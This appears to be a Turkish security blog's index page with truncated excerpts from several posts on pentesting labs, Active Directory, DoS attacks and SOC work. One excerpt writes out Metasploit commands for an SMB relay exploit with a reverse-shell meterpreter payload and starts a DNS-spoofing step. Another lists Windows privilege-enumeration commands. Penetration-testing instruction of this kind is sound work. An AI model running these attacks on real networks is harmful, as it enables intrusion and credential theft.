Unattended Installation (Gözetimsiz Kurulum), bir yazılımın otomatik olarak, kullanıcı müdahalesi olmadan kurulumunu ifade eder. Bu tür kurulumlar, genellikle bir yanıt dosyası (örneğin, unattend.xml) kullanarak gerçekleştirilir. Yanıt dosyası, kurulum sırasında gerekli olan ayarları ve yapılandırmaları önceden tanımlar, böylece kurulum süreci otomatik hale gelir. PowerSploit “PowerSploit, sızma testlerinde tüm aşamalarda test uzmanlarına yardımcı olmak için kullanılabilecek Microsoft …
msfconsole’u başlatın ve SMB Relay exploit’ini yapılandırın:Komutlar: msfconsole use exploit/windows/smb/smb_relay set SRVHOST 172.16.5.101 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 172.16.5.101 set SMBHOST 172.16.5.10 exploit Kurbanı, domaindeki herhangi bir ana bilgisayara yapılan her SMB bağlantısında Metasploit sistemimize yönlendirmek için dnsspoof’u yapılandırın: sportsfoo.com alan adındaki tüm alt alan adlarını saldırgan makinemize yönlendiren sahte bir DNS girişiyle bir dosya oluşturun.Komut: echo “172.16.5.101 …
Herkese merhabalar. Wmware Workstation üzerinden kendi active directory sistemimizi ayaklandırıp penetrasyon testlerini gerçekleştireceğiz. 1-) İlk önce Windows server 2012 R ile ana AD(Active Directory) kurulumunu gerçekleştireceğiz. Domain Controller: Windows-DC Domain: s1ber.com Ardından gerekli kullanıcıları, domain admin, enterprise admin ve gerekli diğer bilgisayarları kuracağız. 2-) Windows server 2016 üzerinden alt alan adı(child domain) kuracağız. Domain controller …
Mevcut kullanıcı ayrıcalıklarını öğrenmek için:whoami /priv whoami /groups whoami /all Get-LocalUser Kullanıcıların adlarını, etkin olup olmadıklarını ve son oturum açma zamanlarını görmek için: Get-LocalUser | ft Name,Enabled,LastLogon net accounts net user administrator Get-LocalGroup Get-LocalGroup | ft Name Get-LocalGroupMember Administrators Bu komutlar, Domain Admins grubunun Administrators grubunun bir üyesi olduğunu gösterir. Domain Admins grubu, genellikle bir …
1. JavaScript Kullanımı ile E-posta Gizleme E-posta adreslerini doğrudan HTML’de yazmak yerine, JavaScript ile oluşturabilirsiniz. Bu yöntem, temel botları engelleyebilir. 2. CAPTCHA Kullanımı E-posta formlarınızın önüne CAPTCHA koyarak, form doldurulması sırasında botların işlem yapmasını zorlaştırabilirsiniz. 3. E-posta Adreslerini Görsel Olarak Gösterme E-posta adreslerini metin yerine görsel olarak gösterebilirsiniz. Bu yöntem, otomatik tarayıcıların e-posta adreslerini okuyamamasını …
“Merhaba arkadaşlar, Güvenlik dünyasında önemli bir adım olan güvenlik açığı taramalarını ele alacağımız bu yazıda iç ağın varlık sayımının ne kadar kritik olduğunu vurgulamak istiyorum. Her ne kadar teknik bir konu gibi görünse de, aslında bu adım, sistemlerimizi korumak için atacağımız en temel adımlardan biri. İç ağımızda bulunan varlıkları belirlemek ve hangi sistemlerin güvenlik açıklarına …
Son yıllarda internet güvenliği büyük önem taşıyor. Maalesef, siber saldırılar ve veri ihlalleri giderek artmakta ve pek çok insanın kişisel bilgileri tehlikeye atılmaktadır. Bu tür bir veri ihlali, e-posta hesaplarına yetkisiz erişim sağlamak veya kullanıcı adları gibi hassas bilgilere ulaşmak amacıyla gerçekleştirilen kötü niyetli bir girişimi ifade eder. Son zamanlarda ortaya çıkan büyük ölçekli bir …
DoS ve DDoS Saldırıları: Giriş İlk bakışta, DoS ve DDoS saldırıları, bir hedef sistem ya da servisi aşırı taleple bombalayarak onu çökertmeyi amaçlayan siber saldırı türleridir. Ancak, aralarındaki temel farklara değinmeden önce, bu saldırıların neye dayandığını anlamamız önemlidir. DoS saldırıları, bir saldırganın tek bir noktadan bir hedefe doğrudan saldırmasıyla gerçekleşir. Bu, genellikle sunucunun aşırı talep …
SOC Analisti nedir anlamak için önce bir SOC Analist’in ne yaptığını bilmelisiniz. Bir SOC Analisti, bir şirketin siber güvenlik ve güvenlik operasyonlarıyla ilgilenen bir profesyoneldir. Siber saldırılara ilk yanıt veren ve bu saldırılara karşı önlemler alan kişilerdir. Güvenlik tehditlerini belirler, analiz eder ve çözerler. Ayrıca, şirketin hassas bilgi ve verilerini hacker’lar ve kötü niyetli faaliyetlerden …